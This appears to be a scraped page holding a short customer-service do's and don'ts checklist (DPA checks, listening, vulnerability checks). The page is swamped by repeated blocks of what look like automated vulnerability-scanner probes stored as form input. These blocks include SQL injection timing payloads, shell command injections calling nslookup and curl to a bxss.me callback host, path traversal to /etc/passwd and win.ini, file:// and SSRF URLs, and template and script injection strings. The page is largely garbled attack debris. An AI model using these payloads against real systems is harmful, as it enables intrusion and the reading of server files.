Do's
Don'ts
Keep a clear and consistent voice
DPA check with existing customers: DOB, first line of address and postcode
Work through the customer journey
Listen to the customer
Phonetically check the names on Will amendments
Check for vulnerability
Read validation script
1
1
1
response.write(9831047*9215501)
'+response.write(9831047*9215501)+'
echo emhlad$()\ gwlwsp\nz^xyu||a #' &echo emhlad$()\ gwlwsp\nz^xyu||a #|" &echo emhlad$()\ gwlwsp\nz^xyu||a #
"+response.write(9831047*9215501)+"
../../../../../../../../../../../../../../etc/passwd
&echo jnkvls$()\ uctipe\nz^xyu||a #' &echo jnkvls$()\ uctipe\nz^xyu||a #|" &echo jnkvls$()\ uctipe\nz^xyu||a #
../../../../../../../../../../../../../../windows/win.ini
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
file:///etc/passwd
|echo qyynye$()\ zfhdqv\nz^xyu||a #' |echo qyynye$()\ zfhdqv\nz^xyu||a #|" |echo qyynye$()\ zfhdqv\nz^xyu||a #
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
1
Http://bxss.me/t/fit.txt
(nslookup -q=cname hitoupsoxobfx83c21.bxss.me||curl hitoupsoxobfx83c21.bxss.me))
../1
$(nslookup -q=cname hitqsipgexwltd007d.bxss.me||curl hitqsipgexwltd007d.bxss.me)
http://bxss.me/t/fit.txt?.jpg
&nslookup -q=cname hitfitfjojiht626bb.bxss.me&'\"`0&nslookup -q=cname hitfitfjojiht626bb.bxss.me&`'
1
/etc/shells
&(nslookup -q=cname hitegnginfgvh09d2e.bxss.me||curl hitegnginfgvh09d2e.bxss.me)&'\"`0&(nslookup -q=cname hitegnginfgvh09d2e.bxss.me||curl hitegnginfgvh09d2e.bxss.me)&`'
'"()
c:/windows/win.ini
1'&&sleep(27*1000)*cmomax&&'
1"&&sleep(27*1000)*hammye&&"
|(nslookup -q=cname hitziwcbjdaco7832b.bxss.me||curl hitziwcbjdaco7832b.bxss.me)
1'||sleep(27*1000)*gwsbuw||'
1"||sleep(27*1000)*kjwjtf||"
bxss.me
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
`(nslookup -q=cname hitjviaugqrbbfe46f.bxss.me||curl hitjviaugqrbbfe46f.bxss.me)`
1'"()&%
add_do.php
add_do.php
;(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)|(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)&(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)
add_do.php/.
19914235
bfg1414<s1﹥s2ʺs3ʹhjl1414
bfgx1192z1z2abcxhjl1192
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
bfg9432<s1﹥s2ʺs3ʹhjl9432
bfgx3072z1z2abcxhjl3072
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
1
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
-1 OR 2+130-130-1=0+0+0+1 --
-1 OR 2+80-80-1=0+0+0+1
-1' OR 2+173-173-1=0+0+0+1 --
-1' OR 2+628-628-1=0+0+0+1 or 'XUYOZOKE'='
-1" OR 2+124-124-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
YZjug0Hm'; waitfor delay '0:0:15' --
-5 OR 861=(SELECT 861 FROM PG_SLEEP(15))--
-5) OR 503=(SELECT 503 FROM PG_SLEEP(15))--
-1)) OR 846=(SELECT 846 FROM PG_SLEEP(15))--
phkAw6wj' OR 18=(SELECT 18 FROM PG_SLEEP(15))--
f16tDgWc') OR 19=(SELECT 19 FROM PG_SLEEP(15))--
7zwSJM7g')) OR 947=(SELECT 947 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),6)||'
1'"
1 %2527%2522
@@oRiGb
1
DPA check with existing customers: DOB, first line of address and postcode
Work through the customer journey
Listen to the customer
Phonetically check the names on Will amendments
Check for vulnerability
Read validation script
1
1
1
response.write(9831047*9215501)
'+response.write(9831047*9215501)+'
echo emhlad$()\ gwlwsp\nz^xyu||a #' &echo emhlad$()\ gwlwsp\nz^xyu||a #|" &echo emhlad$()\ gwlwsp\nz^xyu||a #
"+response.write(9831047*9215501)+"
../../../../../../../../../../../../../../etc/passwd
&echo jnkvls$()\ uctipe\nz^xyu||a #' &echo jnkvls$()\ uctipe\nz^xyu||a #|" &echo jnkvls$()\ uctipe\nz^xyu||a #
../../../../../../../../../../../../../../windows/win.ini
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
file:///etc/passwd
|echo qyynye$()\ zfhdqv\nz^xyu||a #' |echo qyynye$()\ zfhdqv\nz^xyu||a #|" |echo qyynye$()\ zfhdqv\nz^xyu||a #
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
1
Http://bxss.me/t/fit.txt
(nslookup -q=cname hitoupsoxobfx83c21.bxss.me||curl hitoupsoxobfx83c21.bxss.me))
../1
$(nslookup -q=cname hitqsipgexwltd007d.bxss.me||curl hitqsipgexwltd007d.bxss.me)
http://bxss.me/t/fit.txt?.jpg
&nslookup -q=cname hitfitfjojiht626bb.bxss.me&'\"`0&nslookup -q=cname hitfitfjojiht626bb.bxss.me&`'
1
/etc/shells
&(nslookup -q=cname hitegnginfgvh09d2e.bxss.me||curl hitegnginfgvh09d2e.bxss.me)&'\"`0&(nslookup -q=cname hitegnginfgvh09d2e.bxss.me||curl hitegnginfgvh09d2e.bxss.me)&`'
'"()
c:/windows/win.ini
1'&&sleep(27*1000)*cmomax&&'
1"&&sleep(27*1000)*hammye&&"
|(nslookup -q=cname hitziwcbjdaco7832b.bxss.me||curl hitziwcbjdaco7832b.bxss.me)
1'||sleep(27*1000)*gwsbuw||'
1"||sleep(27*1000)*kjwjtf||"
bxss.me
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
`(nslookup -q=cname hitjviaugqrbbfe46f.bxss.me||curl hitjviaugqrbbfe46f.bxss.me)`
1'"()&%
add_do.php
add_do.php
;(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)|(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)&(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)
add_do.php/.
19914235
bfg1414<s1﹥s2ʺs3ʹhjl1414
bfgx1192z1z2abcxhjl1192
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
bfg9432<s1﹥s2ʺs3ʹhjl9432
bfgx3072z1z2abcxhjl3072
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
1
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
-1 OR 2+130-130-1=0+0+0+1 --
-1 OR 2+80-80-1=0+0+0+1
-1' OR 2+173-173-1=0+0+0+1 --
-1' OR 2+628-628-1=0+0+0+1 or 'XUYOZOKE'='
-1" OR 2+124-124-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
YZjug0Hm'; waitfor delay '0:0:15' --
-5 OR 861=(SELECT 861 FROM PG_SLEEP(15))--
-5) OR 503=(SELECT 503 FROM PG_SLEEP(15))--
-1)) OR 846=(SELECT 846 FROM PG_SLEEP(15))--
phkAw6wj' OR 18=(SELECT 18 FROM PG_SLEEP(15))--
f16tDgWc') OR 19=(SELECT 19 FROM PG_SLEEP(15))--
7zwSJM7g')) OR 947=(SELECT 947 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),6)||'
1'"
1 %2527%2522
@@oRiGb
1
1
1
1
1
1
1
response.write(9671713*9450312)
'+response.write(9671713*9450312)+'
"+response.write(9671713*9450312)+"
echo vsrjea$()\ vibmcc\nz^xyu||a #' &echo vsrjea$()\ vibmcc\nz^xyu||a #|" &echo vsrjea$()\ vibmcc\nz^xyu||a #
&echo swjyzb$()\ keolga\nz^xyu||a #' &echo swjyzb$()\ keolga\nz^xyu||a #|" &echo swjyzb$()\ keolga\nz^xyu||a #
|echo xucwxb$()\ nllyww\nz^xyu||a #' |echo xucwxb$()\ nllyww\nz^xyu||a #|" |echo xucwxb$()\ nllyww\nz^xyu||a #
(nslookup -q=cname hitilrmbpgqfz800f1.bxss.me||curl hitilrmbpgqfz800f1.bxss.me))
$(nslookup -q=cname hitsaaawtkssx45eda.bxss.me||curl hitsaaawtkssx45eda.bxss.me)
&nslookup -q=cname hitnqyranvedc5f058.bxss.me&'\"`0&nslookup -q=cname hitnqyranvedc5f058.bxss.me&`'
&(nslookup -q=cname hitouypjknuizccc2a.bxss.me||curl hitouypjknuizccc2a.bxss.me)&'\"`0&(nslookup -q=cname hitouypjknuizccc2a.bxss.me||curl hitouypjknuizccc2a.bxss.me)&`'
|(nslookup -q=cname hitqbamssehjo30a02.bxss.me||curl hitqbamssehjo30a02.bxss.me)
`(nslookup -q=cname hitdeayycanig5c483.bxss.me||curl hitdeayycanig5c483.bxss.me)`
../../../../../../../../../../../../../../etc/passwd
;(nslookup -q=cname hitghimafgkcf47fed.bxss.me||curl hitghimafgkcf47fed.bxss.me)|(nslookup -q=cname hitghimafgkcf47fed.bxss.me||curl hitghimafgkcf47fed.bxss.me)&(nslookup -q=cname hitghimafgkcf47fed.bxss.me||curl hitghimafgkcf47fed.bxss.me)
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
../../../../../../../../../../../../../../windows/win.ini
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
file:///etc/passwd
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
1
/etc/shells
../1
c:/windows/win.ini
1
bxss.me
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
add_dont.php
1
add_dont.php
add_dont.php/.
'"()
1'"()&%
1'&&sleep(27*1000)*xoevcn&&'
1"&&sleep(27*1000)*eshjbq&&"
19997094
1'||sleep(27*1000)*ejagqz||'
1"||sleep(27*1000)*twuifi||"
bfg3695<s1﹥s2ʺs3ʹhjl3695
bfgx4241z1z2abcxhjl4241
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
bfg5995<s1﹥s2ʺs3ʹhjl5995
bfgx6109z1z2abcxhjl6109
<%={{={@{#{${dfb}}%>
1
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
-1 OR 2+789-789-1=0+0+0+1 --
-1 OR 2+979-979-1=0+0+0+1
-1' OR 2+126-126-1=0+0+0+1 --
-1' OR 2+686-686-1=0+0+0+1 or 'nGVyNcrb'='
-1" OR 2+907-907-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
jlJJwDOp'; waitfor delay '0:0:15' --
-5 OR 249=(SELECT 249 FROM PG_SLEEP(15))--
-5) OR 47=(SELECT 47 FROM PG_SLEEP(15))--
-1)) OR 569=(SELECT 569 FROM PG_SLEEP(15))--
2A8vCF17' OR 385=(SELECT 385 FROM PG_SLEEP(15))--
8nm7cbmj') OR 770=(SELECT 770 FROM PG_SLEEP(15))--
Ef1kRjXr')) OR 785=(SELECT 785 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1 %2527%2522
@@zgFhD
1
1
1
1
1
1
response.write(9671713*9450312)
'+response.write(9671713*9450312)+'
"+response.write(9671713*9450312)+"
echo vsrjea$()\ vibmcc\nz^xyu||a #' &echo vsrjea$()\ vibmcc\nz^xyu||a #|" &echo vsrjea$()\ vibmcc\nz^xyu||a #
&echo swjyzb$()\ keolga\nz^xyu||a #' &echo swjyzb$()\ keolga\nz^xyu||a #|" &echo swjyzb$()\ keolga\nz^xyu||a #
|echo xucwxb$()\ nllyww\nz^xyu||a #' |echo xucwxb$()\ nllyww\nz^xyu||a #|" |echo xucwxb$()\ nllyww\nz^xyu||a #
(nslookup -q=cname hitilrmbpgqfz800f1.bxss.me||curl hitilrmbpgqfz800f1.bxss.me))
$(nslookup -q=cname hitsaaawtkssx45eda.bxss.me||curl hitsaaawtkssx45eda.bxss.me)
&nslookup -q=cname hitnqyranvedc5f058.bxss.me&'\"`0&nslookup -q=cname hitnqyranvedc5f058.bxss.me&`'
&(nslookup -q=cname hitouypjknuizccc2a.bxss.me||curl hitouypjknuizccc2a.bxss.me)&'\"`0&(nslookup -q=cname hitouypjknuizccc2a.bxss.me||curl hitouypjknuizccc2a.bxss.me)&`'
|(nslookup -q=cname hitqbamssehjo30a02.bxss.me||curl hitqbamssehjo30a02.bxss.me)
`(nslookup -q=cname hitdeayycanig5c483.bxss.me||curl hitdeayycanig5c483.bxss.me)`
../../../../../../../../../../../../../../etc/passwd
;(nslookup -q=cname hitghimafgkcf47fed.bxss.me||curl hitghimafgkcf47fed.bxss.me)|(nslookup -q=cname hitghimafgkcf47fed.bxss.me||curl hitghimafgkcf47fed.bxss.me)&(nslookup -q=cname hitghimafgkcf47fed.bxss.me||curl hitghimafgkcf47fed.bxss.me)
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
../../../../../../../../../../../../../../windows/win.ini
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
file:///etc/passwd
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
1
/etc/shells
../1
c:/windows/win.ini
1
bxss.me
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
add_dont.php
1
add_dont.php
add_dont.php/.
'"()
1'"()&%
1'&&sleep(27*1000)*xoevcn&&'
1"&&sleep(27*1000)*eshjbq&&"
19997094
1'||sleep(27*1000)*ejagqz||'
1"||sleep(27*1000)*twuifi||"
bfg3695<s1﹥s2ʺs3ʹhjl3695
bfgx4241z1z2abcxhjl4241
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
bfg5995<s1﹥s2ʺs3ʹhjl5995
bfgx6109z1z2abcxhjl6109
<%={{={@{#{${dfb}}%>
1
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
-1 OR 2+789-789-1=0+0+0+1 --
-1 OR 2+979-979-1=0+0+0+1
-1' OR 2+126-126-1=0+0+0+1 --
-1' OR 2+686-686-1=0+0+0+1 or 'nGVyNcrb'='
-1" OR 2+907-907-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
jlJJwDOp'; waitfor delay '0:0:15' --
-5 OR 249=(SELECT 249 FROM PG_SLEEP(15))--
-5) OR 47=(SELECT 47 FROM PG_SLEEP(15))--
-1)) OR 569=(SELECT 569 FROM PG_SLEEP(15))--
2A8vCF17' OR 385=(SELECT 385 FROM PG_SLEEP(15))--
8nm7cbmj') OR 770=(SELECT 770 FROM PG_SLEEP(15))--
Ef1kRjXr')) OR 785=(SELECT 785 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1 %2527%2522
@@zgFhD
1